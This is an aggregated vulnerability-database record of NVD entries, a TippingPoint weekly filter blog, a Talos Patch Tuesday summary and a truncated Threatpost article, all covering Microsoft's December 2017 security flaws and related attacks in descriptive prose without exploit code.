"cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:24", "description": "Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how Microsoft Edge handles objects in memory, aka \"Microsoft Edge Memory Corruption Vulnerability\".", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11888", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11888"], "modified": "2017-12-29T14:39:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11888", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11888", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:28", "description": "Device Guard in Windows 10 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows a security feature bypass vulnerability due to the way untrusted files are handled, aka \"Microsoft Windows Security Feature Bypass Vulnerability\".", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11899", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11899"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1709", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2017-11899", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11899", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*"]}], "trendmicroblog": [{"lastseen": "2018-01-09T09:54:31", "description": "![](http://blog.trendmicro.com/wp-content/uploads/2017/08/TippingPoint-300x205.jpg)\n\nIf you read my weekly blog or follow me on [Twitter](<https://twitter.com/elisal>), you know that I\u2019m a huge sports fan. Unfortunately, when you don\u2019t live in the town of your favorite team, you can be subject to blackout rules. So, my husband and I decided to purchase NFL Sunday Ticket from DirecTV. Fast forward to a couple of years ago \u2013 I wanted to watch my team play, but the channel that the game was supposed to be on was showing another game featuring my least favorite team instead. Needless to say, I was a little upset. I called DirecTV and I wasn\u2019t shy about my feelings on the situation. The customer service representative put me on hold to figure out the problem. Why wasn\u2019t I able to see my game? The game was already over. I\u2019m sure the team at DirecTV had a big laugh over my mistake, but I owned up to it and apologized to the representative.\n\nWhen a vulnerability is submitted to the Zero Day Initiative (ZDI), the affected vendor is given 120 days to take action to patch the vulnerability. If the deadline is not met, the ZDI will publicly disclose the vulnerability in accordance with its disclosure policy. Earlier this week, the Zero Day Initiative (ZDI) published a zero-day vulnerability as a result of a vendor not patching a vulnerability. One of our internal researchers, [Ricky Lawshae](<https://twitter.com/HeadlessZeke>), submitted a vulnerability to the Zero Day Initiative in mid-June of this year involving equipment that DirecTV uses with its Wireless Genie devices. The affected equipment is a Linksys WVBR0-25 which is used as a wireless video bridge. Ricky reviewed the scripts running on the Linksys device and found one that he could to inject additional commands. He was able to implement a root shell on the box in less than 30 seconds by exploiting this command injection vulnerability, which ultimately granted him full remote unauthenticated administrator control over the device. The ZDI attempted to contact the vendor several times regarding the vulnerability but never received a reply. The ZDI informed Linksys that the vulnerability would be published on December 12, 2017. You can read [Ricky\u2019s blog](<https://www.zerodayinitiative.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair>) to get more details on this vulnerability as well as view a video of the exploit in action.**Microsoft Update**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before December 12, 2017. Security patches were released by Microsoft covering Internet Explorer (IE), Edge, Windows, Office, SharePoint, and Exchange. Three of the Microsoft CVEs came through the ZDI program. The following table maps Digital Vaccine filters to the Microsoft updates. Filters marked with an asterisk (*) shipped prior to this DV package, providing preemptive zero-day protection for customers. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [December 2017 Security Update Review](<https://www.zerodayinitiative.com/blog/2017/12/12/the-december-2017-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2017-11885 | 30092 | \nCVE-2017-11886 | 30069 | \nCVE-2017-11887 | 20792 | \nCVE-2017-11888 | 30070 | \nCVE-2017-11889 | 30075 | \nCVE-2017-11890 | 30068 | \nCVE-2017-11893 | 30076 | \nCVE-2017-11894 | 30077 | \nCVE-2017-11895 | 30078 | \nCVE-2017-11899 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11901 | *29900 | \nCVE-2017-11903 | 30079 | \nCVE-2017-11905 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11906 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11907 | 30081 | \nCVE-2017-11908 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11909 | 30082 | \nCVE-2017-11910 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11911 | 30083 | \nCVE-2017-11912 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11913 | *29786 | \nCVE-2017-11914 | 30080 | \nCVE-2017-11916 | 30085 | \nCVE-2017-11918 | 30074 | \nCVE-2017-11919 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11927 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11930 | 30086 | \nCVE-2017-11932 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11934 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11935 | 30088 | \nCVE-2017-11936 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2017-11937 | 30093 | \nCVE-2017-11939 | | Vendor Deemed Reproducibility or Exploitation Unlikely \n \n \n\n**End of Support Bulletin**\n\nEarlier this week, we announced the end of support for a number of TippingPoint software releases across various models.\n\nDate of Announcement: December 12, 2017\n\n \n\nAffected IPS (N/NX-Series) TOS Versions: 3.7.0, 3.7.1, 3.7.2, 3.8.0, 3.8.1, 3.8.2, 3.8.3, 3.9.0, 3.9.1\n\nEnd of Engineering: March 31, 2018\n\nEnd of Support: December 31, 2018\n\n \n\nAffected IPS (S-Series) TOS Versions: 3.6.4, 3.6.5, 3.6.6\n\nEnd of Engineering: March 31, 2018\n\nEnd of Support: December 31, 2018\n\n \n\nAffected TPS TOS Versions: 4.0.2, 4.1.0, 4.1.1, 4.1.2, 4.2.0\n\nEnd of Engineering: March 31, 2018\n\nEnd of Support: December 31, 2018\n\n \n\nAffected SMS TOS Versions: 4.4.0\n\nEnd of Engineering: March 31, 2018\n\nEnd of Support: December 31, 2018\n\n \n\nFactory Release of TPS 5.0.0: October 16, 2017\n\nFactory Release of SMS 5.0.0: March 31, 2018\n\nFactory Release of IPS 3.8.4: March 31, 2018\n\nCustomers with any questions or need assistance with migration planning can contact the TippingPoint Technical Assistance Center. Release notes are also available on <https://tmc.tippingpoint.com>.\n\n**Zero-Day Filters**\n\nThere are no new zero-day filters in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**Updated Existing Zero-Day Filters**\n\nThis section highlights specific filter(s) of interest in this week\u2019s Digital Vaccine package that have been updated as a result of a vendor either issuing a patch for a vulnerability found via the Zero Day Initiative or a vulnerability that has been published by the Zero Day Initiative in accordance with its Disclosure Policy.\n\nThis week\u2019s updated zero-day filters focus on two of the vulnerabilities from this month\u2019s Microsoft update. The updated filters reflect the fact that the vulnerabilities have been published because Microsoft has issued patches for them. The dates in parentheses after each filter reflects the date we had protection in place for our customers:\n\n**_Microsoft (2)_**\n\n\u2022 29900: HTTP: Microsoft Chakra Javascript Array JIT Optimization Type Confusion Vulnerability (November 7, 2017)\n\n\u2022 29786: HTTP: Microsoft Windows VBScript VT_BSTR Use-After-Free Vulnerability (October 24, 2017)\n\n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-december-4-2017/>).", "cvss3": {}, "published": "2017-12-15T16:06:45", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of December 11, 2017", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930", "CVE-2017-11932", "CVE-2017-11934", "CVE-2017-11935", "CVE-2017-11936", "CVE-2017-11937", "CVE-2017-11939"], "modified": "2017-12-15T16:06:45", "id": "TRENDMICROBLOG:83CF76ED2F779A162F6FE7688839D2BF", "href": "http://blog.trendmicro.com/tippingpoint-threat-intelligence-zero-day-coverage-week-december-11-2017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2018-01-29T19:59:50", "description": "Today, Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 34 new vulnerabilities with 21 of them rated critical and 13 of them rated important. These vulnerabilities impact Edge, Exchange, Internet Explorer, Office, Scripting Engine, Windows, and more. \n \nIn addition to the 33 vulnerabilities addressed, Microsoft has also released an update for Microsoft Office which improves security by disabling the Dynamic Data Exchange (DDE) protocol. This update is detailed in [ADV170021](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170021>) and impacts all supported versions of Office. Organizations who are unable to install this update should consult the advisory for workaround that help mitigate DDE exploitation attempts. \n \n\n\n## Vulnerabilities Rated Critical\n\n \nMicrosoft has assigned the following vulnerabilities a Critical severity rating: \n \n\n\n * [CVE-2017-11886 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11886>)\n * [CVE-2017-11888 - Microsoft Edge Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11888>)\n * [CVE-2017-11889 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11889>)\n * [CVE-2017-11890 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11890>)\n * [CVE-2017-11893 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11893>)\n * [CVE-2017-11894 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11894>)\n * [CVE-2017-11895 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11895>)\n * [CVE-2017-11901 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11901>)\n * [CVE-2017-11903 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11903>)\n * [CVE-2017-11905 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11905>)\n * [CVE-2017-11907 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11907>)\n * [CVE-2017-11908 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11908>)\n * [CVE-2017-11909 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11909>)\n * [CVE-2017-11910 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11910>)\n * [CVE-2017-11911 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11911>)\n * [CVE-2017-11912 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11912>)\n * [CVE-2017-11914 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11914>)\n * [CVE-2017-11918 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11918>)\n * [CVE-2017-11930 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11930>)\n * [CVE-2017-11937 - Microsoft Malware Protection Engine Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11937>)\n * [CVE-2017-11940 - Microsoft Malware Protection Engine Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11940>)\n \n \nThe following is a brief description of each vulnerability. \n \n\n\n### Multiple CVEs - Scripting Engine Memory Corruption Vulnerability\n\n \nMultiple vulnerabilities have been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to remotely execute arbitrary code. These vulnerabilities all manifest due to the scripting engines in Edge and Internet Explorer improperly handling objects in memory. As a result, successful exploitation could lead to arbitrary code execution in the context of the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of these vulnerabilities or, in some cases, opens a Microsoft Office document containing an embedded ActiveX control marked \"safe for initialization.\" \n \nThe following is a list of CVEs related to these vulnerabilities: \n \n\n\n * CVE-2017-11886\n * CVE-2017-11889\n * CVE-2017-11890\n * CVE-2017-11893\n * CVE-2017-11894\n * CVE-2017-11895\n * CVE-2017-11901\n * CVE-2017-11903\n * CVE-2017-11905\n * CVE-2017-11907\n * CVE-2017-11908\n * CVE-2017-11909\n * CVE-2017-11910\n * CVE-2017-11911\n * CVE-2017-11912\n * CVE-2017-11914\n * CVE-2017-11918\n * CVE-2017-11930\n \n \n\n\n### CVE-2017-11888 - Microsoft Edge Memory Corruption Vulnerability\n\n \nA vulnerability have been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to remotely execute arbitrary code. This vulnerability manifests due to the scripting engines in Edge and Internet Explorer improperly handling objects in memory. As a result, successful exploitation could lead to arbitrary code execution in the context of the current user. Users could be exploited if they navigate to a malicious web page designed to exploit of these vulnerabilities. \n \n\n\n### Multiple CVEs - Microsoft Malware Protection Engine Remote Code Execution Vulnerability\n\n \nTwo arbitrary code execution vulnerabilities have been identified within the Microsoft Malware Protection Engine that could allow an attacker to execute code in the context of the LocalSystem account. These vulnerabilities manifest as a result of the engine improperly scanning files. Exploitation of these vulnerabilities is achievable if the system scans a specially crafted file with an affected version of the Microsoft Malware Protection Engine. Note that these update typically will not require action by users or administrators as the the built-in mechanism for automatic deployment of these updates will account within 48 hours of release. \n \n\n\n * CVE-2017-11937\n * CVE-2017-11940\n \n\n\n## Vulnerabilities Rated Important\n\n \nMicrosoft has assigned the following vulnerabilities an Important severity rating: \n \n\n\n * [CVE-2017-11885 - Windows RRAS Service Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11885>)\n * [CVE-2017-11887 - Scripting Engine Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11887>)\n * [CVE-2017-11899 - Microsoft Windows Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11899>)\n * [CVE-2017-11906 - Scripting Engine Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11906>)\n * [CVE-2017-11913 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11913>)\n * [CVE-2017-11916 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11916>)\n * [CVE-2017-11919 - Scripting Engine Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11919>)\n * [CVE-2017-11927 - Microsoft Windows Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11927>)\n * [CVE-2017-11932 - Microsoft Exchange Spoofing Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11932>)\n * [CVE-2017-11934 - Microsoft PowerPoint Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11934>)\n * [CVE-2017-11935 - Microsoft Excel Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11935>)\n * [CVE-2017-11936 - Microsoft SharePoint Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11936>)\n * [CVE-2017-11939 - Microsoft Office Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11939>)\n \n \nThe following is a brief description of each vulnerability. \n \n\n\n### CVE-2017-11885 - Windows RRAS Service Remote Code Execution Vulnerability\n\n \nA vulnerability has been identified that exists in RPC on systems where Routing and Remote Access is enabled. Successful exploitation of this vulnerability could result in code execution. In order to exploit this vulnerability, an attacker would need to run an application specifically designed to exploit this vulnerability. Routing and Remote access is not enabled in default configurations of Windows. On systems where Routing and Remote Access is disabled, the system is not vulnerable. \n \n\n\n### Multiple CVEs - Scripting Engine Information Disclosure Vulnerability\n\n \nMultiple vulnerabilities have been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to obtain information to further compromise a user's system. These vulnerabilities all manifest due to the scripting engine improperly handling objects in memory. Successful exploitation would give an attacker sensitive information that could then be used in other exploits. A scenario where users could be exploited include web-based attacks, where a user navigates to a malicious web page designed to exploit of one of these vulnerabilities. \n \nThe following is a list of CVEs related to these vulnerabilities: \n \n\n\n * CVE-2017-11887\n * CVE-2017-11906\n * CVE-2017-11919\n \n \n\n\n### CVE-2017-11899 - Microsoft Windows Security Feature Bypass Vulnerability\n\n \nA vulnerability has been identified that affects Device Guard. Successful exploitation of this vulnerability could result in Device Guard incorrectly validating untrusted files. As Device Guard uses signatures to determine whether a file is benign or malicious, this could cause Device Guard to allow a malicious file to execute on vulnerable systems. An attacker could leverage this vulnerability to cause an untrusted file to appear as if it is trusted. \n \n\n\n### Multiple CVEs - Scripting Engine Memory Corruption Vulnerability\n\n \nMultiple vulnerabilities have been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to remotely execute arbitrary code. These vulnerabilities all manifest due to the scripting engines in Edge and Internet Explorer improperly handling objects in memory. As a result, successful exploitation could lead to arbitrary code execution in the context of the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of these vulnerabilities or, in some cases, opens a Microsoft Office document containing an embedded ActiveX control marked \"safe for initialization.\" \n \nThe following is a list of CVEs related to these vulnerabilities: \n \n\n\n * CVE-2017-11913\n * CVE-2017-11916\n \n \n\n\n### CVE-2017-11927 - Microsoft Windows Information Disclosure Vulnerability\n\n \nAn information disclosure vulnerability has been identified that affects the Windows its:// protocol handler. This vulnerability manifests due to the protocol handler sending network traffic to a remote site when determining the zone associated with a URL that is provided to the protocol handler. An attacker could attempt to leverage this vulnerability to obtain sensitive information. This vulnerability could be leveraged to obtain NTLM hash values associated with a victim's account. \n \n\n\n### CVE-2017-11932 - Microsoft Exchange Spoofing Vulnerability\n\n \nA spoofing vulnerability has been identified that affects Microsoft Exchange. This vulnerability manifests due to Outlook Web Access (OWA) failing to properly handle certain web requests. This vulnerability could be leveraged by attackers to inject scripts and content. This vulnerability could also be leveraged to redirect clients to a malicious web site. Successful exploitation of this vulnerability would require an attacker to send victims a specially crafted email containing a malicious link. \n \n\n\n### CVE-2017-11934 - Microsoft PowerPoint Information Disclosure Vulnerability\n\n \nAn information disclosure vulnerability has been identified that affects Microsoft Office. This vulnerability manifests due to Microsoft Office improperly disclosing contents in memory. This vulnerability could be leveraged by an attacker to obtain sensitive information that could be used to launch additional attacks against a target system. Successful exploitation of this vulnerability would require an attacker to send a specially crafted file to a victim and convince them to open the file. \n \n\n\n### CVE-2017-11935 - Microsoft Excel Remote Code Execution Vulnerability\n\n \nAn arbitrary code execution vulnerability has been identified in Microsoft Excel which manifests as a result of improperly handling objects in memory. An attacker could exploit this vulnerability by creating a specially crafted Excel document which triggers the vulnerability. Successful exploitation would allow an attacker to execute arbitrary code in the context of the current user. Scenarios where this could occur include email-based attacks or attacks where users download malicious files off of a site hosting user-created content (DropBox, OneDrive, Google Drive). \n \n\n\n### CVE-2017-11936 - Microsoft SharePoint Elevation of Privilege Vulnerability\n\n \nA privilege escalation vulnerability has been identified in Microsoft SharePoint Server that could potentially allow an attacker to impersonate a user and perform restricted actions. This vulnerability manifests due to SharePoint improperly sanitizing specially crafted web requests. An authenticated user who exploits this vulnerability could proceed to perform a cross-site scripting attack to cause other users to execute arbitrary JavaScript in the context of that user. This could then allow an attacker to read content, change permissions, or inject other malicious content on behalf of that user if permitted. \n \n\n\n### CVE-2017-11939 - Microsoft Office Information Disclosure Vulnerability\n\n \nAn information disclosure vulnerability has been identified in Microsoft Office that could leak a user's private key. This vulnerability manifests as a result of Visual Basic macros in Office incorrectly exporting a user's private key from the certificate store while saving a document. Note that an attacker would need to exploit another vulnerability or socially engineer the user to obtain the document containing the leaked private key in order to leverage it. \n \n\n\n## Coverage\n\n \nIn response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. \n \nSnort Rules: \n \n\n\n * 37283-37284, 45121-45124, 45128-40133, 45138-45153, 45155-45156, 45160-45163,45167-45170.\n \n \n\n\n[![](http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA)](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=1A84Sx13xAc:ZeJ1KmvCEYI:yIl2AUoC8zA>)\n\n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/1A84Sx13xAc)", "cvss3": {}, "published": "2017-12-12T15:32:00", "type": "talosblog", "title": "Microsoft Patch Tuesday - December 2017", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11888", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11899", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11919", "CVE-2017-11927", "CVE-2017-11930", "CVE-2017-11932", "CVE-2017-11934", "CVE-2017-11935", "CVE-2017-11936", "CVE-2017-11937", "CVE-2017-11939", "CVE-2017-11940"], "modified": "2017-12-12T23:32:56", "id": "TALOSBLOG:C29A5D06DFA4855828033CE3321D48DE", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/1A84Sx13xAc/ms-tuesday.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2019-01-23T05:28:01", "description": "Google\u2019s Project Zero released details of a local proof-of-concept attack against a fully patched Windows 10 PC that allows an adversary to execute untrusted JavaScript outside a sandboxed environment on targeted systems.\n\nThe attack is a variation of a WPAD/PAC attack. In Project Zero\u2019s case, the WPAD/PAC attack focuses on chaining several vulnerabilities together relating to the PAC and a Microsoft JScript.dll file in order to gain remote command execution on a victim\u2019s machine.\n\n\u201cWe identified 7 security vulnerabilities in (JScript.dll) and successfully demonstrated reliable code execution from local network (and beyond) against a fully patched (at the time of writing) Windows 10 64-bit with Fall Creators Update installed,\u201d wrote Project Zero researchers [on the teams\u2019 website](<https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html>) Monday.\n\nThe vulnerabilities have since been patched.\n\nWeb Proxy AutoDiscovery (WPAD) protocol attacks are tied to how browsers use PAC (Proxy Auto-Configuration) to navigate HTTP and HTTPS requests. PAC files contain JavaScript that instruct what proxy a browser needs to use to get to a specific URL. If a malicious PAC is introduced to the browser, that allows an attacker to monitor the URL of every request the browser makes.\n\nPrevious researchers have found holes in WPAD ranging from an \u201c[UNHOLY PAC](<https://threatpost.com/wpad-flaws-leak-https-urls/119582/>)\u201d attack identified by SafeBreach to a [man-in-the-middle attack technique](<https://www.contextis.com/blog/leaking-https-urls-20-year-old-vulnerability>) identified by Context Information Security. The technique allowed an attacker to see the entire URL of every site visited even if the traffic is protected with HTTPS encryption.\n\nGoogle\u2019s Project Zero team took WPAD/PAC attacks a step further.\n\n\u201cAs far as we know, this is the first time that an attack against WPAD is demonstrated that results in the complete compromise of the WPAD user\u2019s machine,\u201d researchers said.\n\nWhat Project Zero researchers identified was a new attack vector that directly attacks the Windows JScript engine that interprets the JavaScript PAC files, commented Paul Stone, security consultant at Context Information Security. \u201cThis is a much more powerful and technically complex attack,\u201d he said.\n\nProject Zero focus was on identifying new vulnerabilities in the version of 